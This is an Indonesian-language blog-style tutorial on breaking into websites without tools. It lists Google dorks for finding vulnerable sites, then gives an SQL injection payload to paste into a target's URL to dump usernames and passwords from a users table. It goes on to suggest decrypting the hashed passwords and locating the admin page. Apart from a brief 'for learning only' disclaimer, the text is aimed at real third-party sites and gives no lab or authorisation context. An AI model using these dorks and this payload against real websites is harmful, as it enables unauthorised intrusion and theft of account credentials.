Hacking Website Tanpa Menggunakan Tools

Oke guys, langsung saja nih. cari mencari tau password dan username suatu website. Pertama kali kita harus mencari website yang Vulnerability (Celah Keamanan). Untuk cara mencarinya sudah ane siapiin beberapa dork yang bisa kita pakai untuk mencari celah kemanan suatu website. Berikut beberapa dork yang bisa kita pakai :

Dork :

inurl:kategori-23-hiburan.html
inurl:hal-tentang-kami.html
inurl:statis-1-pengantar.html
inurl:statis-19-beasiswa.html
inurl:statis-22-kerjasama.html
inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html

Setelah memasukan dork di dalam search google, selanjutnya kita akan menemui beberapa website yang memiliki celah keamanan. kita pilih website / target web yang akan kita exploit. Selanjutnya pastekan exploit di dalam url website target, Berikut script Exploitnya :

'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+

Selanjutnya jika berhasil kita akan melihat username dan password website tersebut, sampai disini kita sudah berhasil menemukan password dan usernamenya. Jika passwordnya di encryt kita bisa decrypt password tersebut. di perlukan pengetahuan tentang kriptograpi contoh (md5, sha512 dll)
untuk mencari halaman adminnya, sobat bisa menggunakan tools hacking seperti admin finder dan sebagainya.

Catatan : ini hanya sebagai pembelajaran tentang keamanan suatu website


Untuk menjadi seorang polisi yang baik kita harus menjadi seorang penjahat terlebih dahulu, Oke guys Semoga bermanfaat dan harimu menyenangkan.